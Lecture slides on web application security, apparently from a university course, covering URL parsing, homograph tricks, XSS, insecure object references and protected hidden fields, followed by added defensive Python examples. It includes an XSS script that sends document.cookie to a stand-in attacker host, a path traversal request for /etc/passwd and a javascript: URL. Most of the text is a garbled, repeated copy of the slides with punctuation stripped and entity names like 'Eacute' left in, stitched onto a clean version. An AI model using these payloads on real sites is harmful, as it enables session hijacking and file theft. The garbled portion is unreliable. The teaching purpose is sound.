Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path

/path/to/resource
- A Unix-style path. Must resolve "." and ".." segments.
- Relative paths allow for non-fully-qualified URLs.
- old style apps:
  - direct connection with the file system
  - resource = HTML file served by the server
- modern apps:
  - very indirect: complicated URL rewriting, dynamic content
  - paths mapped to parts of programs or a database
  - the server may be embedded in the app
Question: What implications does this have for reviewing the security of web apps?

Query string

?search=purple+bananas
Optional; intended to pass arbitrary parameters to the resource. The commonly used syntax
    name1=value1&name2=value2
is not part of URL syntax: it comes from mail and HTML forms (application/x-www-form-urlencoded). So
- the server may not presume or enforce a query string format
- web applications may legally use other forms after "?"

Fragment identifier

#lastsection
- Interpretation depends on the client and resource type; in practice, anchor names in HTML elements
- Not intended to be sent to the server
- Recent use: store client-side state while browsing
  - can be changed without a page reload
  - easily bookmarked and shared, e.g. map locations

Metacharacters

- Some punctuation characters are reserved and not allowed unencoded in data, e.g. [ ] $ & ' ( ) =
- These are URL-encoded as a percent sign followed by the ASCII code in hex, e.g. %2F encodes "/", %25 encodes "%"
The RFC does not specify a fixed mapping, and browsers try to interpret as many user inputs as possible, e.g. http://%65xample.%63om/ (percent-encoded letters in the host name).
Moreover, RFCs are not always followed.

Non-ASCII text encodings in URLs

- Original standards did not allow for non-ASCII text
- but clearly desirable for non-English text
- RFC 3492 introduced Punycode to allow a behind-the-scenes DNS lookup:
  - DNS lookup: xn--[US-ASCII part]-[encoded Unicode part]
  - browser display: the Unicode form
Extending the alphabet from 38 characters to 100,000 glyphs allowed many homograph attacks:
- pea.com has 5 identical-looking Cyrillic characters
- there are non-slash characters that look like "/"
- some attacks are not easily prevented by DNS registrars
We have (puny) browser and search engine defences for this. Moral: probably better to stick with ASCII.

Overall consequences

Parsing URLs is more complicated than you imagined:
- better to use well-tested libraries than ad hoc code
But for output, you want to be very careful:
- especially if URLs are made from user (attacker) input
- should canonicalize, then filter, then reformat
- filter especially on the scheme and authority

Overall consequences

Eyeballs can easily be fooled when looking at URLs:
    http://example.com&gibberish=1234@167772161/
    http://example.com\@coredump.cx/
    http://example.com;.coredump.cx/
Which server is visited by these URLs?
Examples from The Tangled Web.

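The "canonicalize, then filter, then reformat" advice from the two slides above, as an added Python example (not code from the lecture or from The Tangled Web): a server-side check for a URL taken from user input before it is echoed into a page or followed. It uses only the standard library; the host allowlist, the sample URLs and the decision to accept only the protocol's default port are assumptions for the demonstration. It also applies the "stick with ASCII" moral from the Punycode slide by refusing xn-- labels.

```python
"""Added example (not from the lecture): canonicalize, then filter, then
reformat an attacker-supplied URL.  Standard library only; the allowlist
and the sample URLs are constructed for the demonstration."""
import posixpath
import re
from urllib.parse import urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"example.com", "www.ed.ac.uk"}        # assumed allowlist
# Plain ASCII DNS labels only: no percent-escapes, no ';' or '\', no IDN.
HOST_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*$")


def canonical_url(raw):
    """Return a canonical http(s) URL on an allowlisted host, or None."""
    try:
        parts = urlsplit(raw.strip())
        port = parts.port                  # ValueError on a non-numeric port
    except ValueError:                     # also raised for a broken IPv6 literal
        return None
    if parts.scheme not in ALLOWED_SCHEMES:
        return None                        # javascript:, mailto:, data: ...
    if parts.username is not None or parts.password is not None:
        return None                        # "example.com&x=1@host" and "\@" tricks
    host = parts.hostname or ""            # urlsplit lower-cases this
    if not HOST_RE.match(host) or any(l.startswith("xn--") for l in host.split(".")):
        return None                        # %65xample, "host;.other", Punycode
    if host not in ALLOWED_HOSTS:
        return None                        # 0x7f.1 passes the regex, fails here
    if port is not None and port != (443 if parts.scheme == "https" else 80):
        return None                        # only the protocol's default port
    path = parts.path or "/"
    if not path.startswith("/") or not all(" " < c < "\x7f" for c in path):
        return None                        # no control or non-ASCII chars in path
    clean = posixpath.normpath(path)       # resolve "." and ".." segments
    if path.endswith("/") and clean != "/":
        clean += "/"                       # normpath drops a trailing slash
    return urlunsplit((parts.scheme, host, clean, parts.query, parts.fragment))


if __name__ == "__main__":
    # Constructed inputs: the lecture's look-alike URLs plus one good one.
    for url in ["HTTP://Example.COM:80/a/../b?x=1#top",
                "http://example.com&gibberish=1234@167772161/",
                "http://example.com\\@coredump.cx/",
                "http://example.com;.coredump.cx/",
                "http:example.com/",
                "javascript://example.com/%0Aalert(1)"]:
        print(repr(url), "->", canonical_url(url))
```

The percent-encoded content of the path is left as it is: if your application decodes it (for instance to map it to a file), normalize the dot segments again after decoding, since "%2e%2e" is not resolved here.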
Outline

- Overview
- Basics: URLs
- Output Filtering and XSS
- Object references

XSS attacks in general

- Attack typically on (another) user of the web app
- Attacker tricks the app into displaying malicious code, typically script code
Many possible aims:
- display random images, popup windows
- change page contents, e.g. alter a bank account number
- session hijacking: steal session cookies

Session hijacking with XSS

[Picture from Innocent Code]
Example injected script:
    <script>document.location.replace("http://www.badguy.example/steal.php?what=" + document.cookie);</script>
- redirects the victim's browser to the attacker's site, passing the cookie
- might also pass the currently visited web page; then the attacker's server can issue a redirect back again

Reflected XSS

Reflected XSS occurs when the injected malicious code isn't stored on the server but is immediately displayed in the visited page. Suppose
    http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc
dynamically makes HTML embedding the title directly:
    <h1>Man GCC</h1>
An attacker could use this with a malicious input
    title=<script>...</script>&program=gcc
which, e.g., steals a cookie.
Exercise: Explain how this attack works in practice.

XSS solutions

Input processing is tricky: you need to understand the data flow through the app, and the quoting and encoding applied as values are passed to and from functions, databases, etc. Hence: output filtering.
Plain output: HTML encoding
- Stored data values need to be encoded to represent them in HTML (e.g. "<" converted to "&lt;", etc.)
Marked-up output: complex filtering
- Need to work through tags in the input and rule out risky ones. Scripts may appear in attributes. Flaky.
Marked-up output: DSL
- A better approach: use a dedicated syntax, converted to a restricted subset of HTML.

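The three output cases above, as an added Python example (not code from the lecture or from Innocent Code): `render_title_unsafe` reproduces the manpage.php pattern from the reflected XSS slide, `render_title` and `title_input` HTML-encode for text and attribute contexts, and `render_markup` is a tiny markup DSL that escapes everything first and only then re-introduces a restricted HTML subset. The `*bold*` and `[text](url)` syntax is an assumption made for the demonstration.

```python
"""Added example (not from the lecture): output encoding for plain text and
a minimal DSL for marked-up output.  The DSL syntax is an assumption."""
import html
import re


def html_text(value):
    """Encode an untrusted string for an HTML text node or a quoted attribute."""
    return html.escape(value, quote=True)   # escapes < > & " '


def render_title_unsafe(title):
    """The vulnerable pattern from the manpage.php example: raw concatenation."""
    return "<h1>" + title + "</h1>"


def render_title(title):
    """Same page, with the title encoded for a text node."""
    return "<h1>" + html_text(title) + "</h1>"


def title_input(value):
    """Reflecting the title into an attribute: the quote must be encoded too."""
    return '<input name="title" value="%s">' % html_text(value)


# Restricted DSL applied *after* escaping: the captured groups can no longer
# contain raw '<', '>' or '"', so the substituted tags are the only markup.
_BOLD = re.compile(r"\*([^*\n]+)\*")
_LINK = re.compile(r"\[([^\]\n]+)\]\((https?://[^\s)]+)\)")  # http(s) only


def render_markup(text):
    """Convert *bold* and [text](http url) to HTML; everything else is data."""
    safe = html_text(text)
    safe = _BOLD.sub(r"<b>\1</b>", safe)
    safe = _LINK.sub(r'<a href="\2">\1</a>', safe)
    return safe


if __name__ == "__main__":
    payload = "<script>document.location='http://www.badguy.example/'</script>"
    print(render_title_unsafe(payload))      # script reaches the browser
    print(render_title(payload))             # rendered as harmless text
    print(render_markup("*hi* [docs](http://example.com/?a=1&b=2) <b>no</b>"))
```

Because the scheme in `_LINK` is fixed to http(s), a `javascript:` URL in link position is left as literal text rather than becoming an attribute, which is the attribute-context problem the "flaky" filtering approach tends to miss.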
Outline

- Overview
- Basics: URLs
- Output Filtering and XSS
- Object references

Embarrassing PHP blunders

http://researchsite.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction
A "cool" PHP script, showhtml.php:
- take a plain HTML file
- wrap it with navigation links and site style
- convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

http://researchsite.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%2Fpasswd
- remote users can visit any file on the system
- the mistake motivates defence-in-depth:
  - the HTTP server should not serve up just any file
  - use internal web server config (separate apps)
  - and external OS config (e.g. "nobody" user, chroot)

Authorization and object access

What was the problem here?
- the app developer (implicitly) authorized users to read the documentation files he had created
  - the project was open source, so no need for logins
  - the app contained no paths to files outside the project
  - so no explicit authorization code was written
- but the PHP code didn't check the filename returned
  - showhtml.php provided access to server objects
  - input validation only checked for file existence
There should have been a re-authorization step. A well-written app should only allow access to its own resources.

Looking at anyone's bank account

<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>
Example from Innocent Code, based on a Norwegian newspaper story about a "17-year-old geek able to view anyone's bank account".
A genius, clearly.

Solutions for object referencing

Re-validate:
- Check authorization again
- Obvious solution, but duplicates effort
Add a data indirection:
- Session-specific server-side array of account numbers
    <option value="1">12345678901</option>
    <option value="2">12346543210</option>
- Similarly for file access:
    http://researchsite.ed.ac.uk/showhtml.php?file=1#Introduction
- for many files, a hash table or database could be used

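Both solutions from the slide above (re-validation and a session-specific indirection table), together with the document-root check that the showhtml.php blunder needed, as an added Python example that is not code from the lecture or from Innocent Code. The ledger, the user names and the `DOC_ROOT` location are constructed for the demonstration; a real application would look the owner up in its database.

```python
"""Added example (not from the lecture): per-session indirect object
references, an ownership re-check on every request, and a path check that
keeps file references under a fixed document root.  Sample data is
constructed."""
import html
import posixpath

# Constructed sample data: account number -> (owner, balance)
LEDGER = {
    "12345678901": ("alice", 100),
    "12346543210": ("alice", 250),
    "99990000001": ("bob", 5),
}
DOC_ROOT = "/srv/app/docs"          # assumed location of the wrapped HTML files


class Session:
    """Server-side table; the client only ever sees small indices into it."""

    def __init__(self, user, accounts):
        self.user = user
        self._objects = []
        self.account_refs = [self.expose(a) for a in accounts]

    def expose(self, obj):
        self._objects.append(obj)
        return len(self._objects)           # 1-based, like value="1"

    def resolve(self, ref):
        try:
            idx = int(ref)
        except (TypeError, ValueError):
            return None
        return self._objects[idx - 1] if 1 <= idx <= len(self._objects) else None


def account_options(session):
    """The <option> list: real account numbers appear only as display text."""
    return "".join(
        '<option value="%d">%s</option>' % (ref, html.escape(session.resolve(ref)))
        for ref in session.account_refs)


def show_account(session, ref):
    """Handler for show-account: indirection plus a re-validation of ownership."""
    account = session.resolve(ref)
    if account is None:
        return None                          # not something this session was shown
    owner, balance = LEDGER.get(account, (None, None))
    if owner != session.user:                # authorization checked again
        return None
    return balance


def doc_path(file_ref):
    """Map a file reference to a path that must stay under DOC_ROOT."""
    candidate = posixpath.normpath(posixpath.join(DOC_ROOT, file_ref))
    if candidate != DOC_ROOT and not candidate.startswith(DOC_ROOT + "/"):
        return None                          # /etc/passwd, ../../etc/passwd
    return candidate                         # symlinks are not resolved here


if __name__ == "__main__":
    s = Session("alice", ["12345678901", "12346543210"])
    print(account_options(s))
    print(show_account(s, "1"), show_account(s, "3"), show_account(s, "99990000001"))
    print(doc_path("release/Userman.html"), doc_path("/etc/passwd"))
```

The indirection alone would already stop the bank example (a raw account number is not a valid reference), but the ownership check in `show_account` is what catches a server-side mistake such as exposing the wrong account list, which is the "duplicates effort" re-validation the slide describes.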
Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified.
<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.
Example: editing a wiki page
<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>
Solution: add a MAC constructed with a server-side secret key:
<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">
Or the pagename could be encrypted (but note that encryption alone does not give integrity: use an authenticated encryption mode, or still add a MAC).

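The MAC solution above, as an added Python example (not code from the lecture or from Innocent Code), using HMAC-SHA256 from the standard library. The server key, the user name and the form values are constructed for the demonstration; binding the MAC to the logged-in user is an addition beyond the slide, so that a field signed in one user's session cannot be replayed in another's.

```python
"""Added example (not from the lecture): protecting a hidden form field with
an HMAC so the client can carry it back but cannot alter it.  Key, user and
field values are constructed for the demonstration."""
import hashlib
import hmac

# Assumed: loaded from server-side configuration and never sent to the client.
SERVER_KEY = b"\x13\x37" * 16


def _mac(pagename, user):
    # Length-prefix each part so ("ab", "c") and ("a", "bc") cannot collide,
    # and include the user so the MAC is only valid in that user's session.
    parts = (pagename.encode("utf-8"), user.encode("utf-8"))
    msg = b"".join(len(p).to_bytes(4, "big") + p for p in parts)
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def hidden_fields(pagename, user):
    """Values for the pagename and pagemac hidden inputs of the edit form."""
    return {"pagename": pagename, "pagemac": _mac(pagename, user)}


def verify_hidden_fields(form, user):
    """Return the trusted pagename, or None if the field was tampered with."""
    pagename = form.get("pagename", "")
    presented = form.get("pagemac", "")
    expected = _mac(pagename, user)
    if not hmac.compare_digest(presented, expected):   # constant-time compare
        return None
    return pagename


if __name__ == "__main__":
    fields = hidden_fields("NineteenSixtiesToys", "alice")
    print(fields)
    print(verify_hidden_fields(fields, "alice"))                      # accepted
    print(verify_hidden_fields(dict(fields, pagename="AdminPage"), "alice"))  # None
```

`hmac.compare_digest` matters here: a byte-by-byte string comparison would leak, through timing, how many leading hex digits of a guessed MAC were correct.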
Other authorization mistakes

Assuming requests occur in the proper order:
- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
- only checking authorization on the first step
Authorization by obscurity:
- Supposing that because a web page is not linked to from the main site, only people who are given it will be able to reach it:
    http://www.myserver.com/secretarea/privatepaper.pdf

Review questions

URLs
